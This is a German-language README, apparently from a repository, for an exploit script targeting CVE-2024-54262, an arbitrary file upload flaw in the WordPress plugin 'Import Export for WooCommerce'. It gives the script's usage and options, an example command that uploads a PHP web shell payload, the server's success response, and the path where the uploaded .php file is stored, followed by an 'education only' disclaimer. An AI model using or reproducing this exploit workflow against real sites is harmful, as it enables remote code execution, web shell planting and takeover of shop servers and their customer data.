
Exploit CVE-2024-54262: Beliebiger Datei-Upload in Import Export für WooCommerce
Exploit CVE-2024-54262: Beliebiger Datei-Upload in Import Export for WooCommerce
Dieses Skript nutzt eine Schwachstelle im WordPress-Plugin "Import Export for WooCommerce" aus. Die Schwachstelle erlaubt es nicht autorisierten Benutzern, beliebige Dateien hochzuladen, was zu potenzieller Remote-Code-Ausführung (RCE) führt.
requestsargparseInstallieren Sie die Abhängigkeiten mit:
pip install requests
3.Stellen Sie sicher, dass die Ziel-WordPress-Seite die verwundbare Version des Plugins verwendet.
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -un USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--command COMMAND, -c COMMAND
PHP shell code to upload
CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"
{
"status": true,
"code": 104,
"message": "Success",
"data": {
"file_name": "import_manual_1737090262.php",
"total_requests": 1,
"import_columns": "all",
"product_search_type": "SKU",
"product_operation": "create_new_update_existing",
"field_separator": ","
}
}
import_manual_1737090262.phpwp-content/uploads/import-export-for-woocommerce/product/Dieses Tool dient nur zu Bildungszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden. Unbefugter Zugriff oder Ausnutzung von Systemen ohne ausdrückliche Erlaubnis ist illegal und unethisch.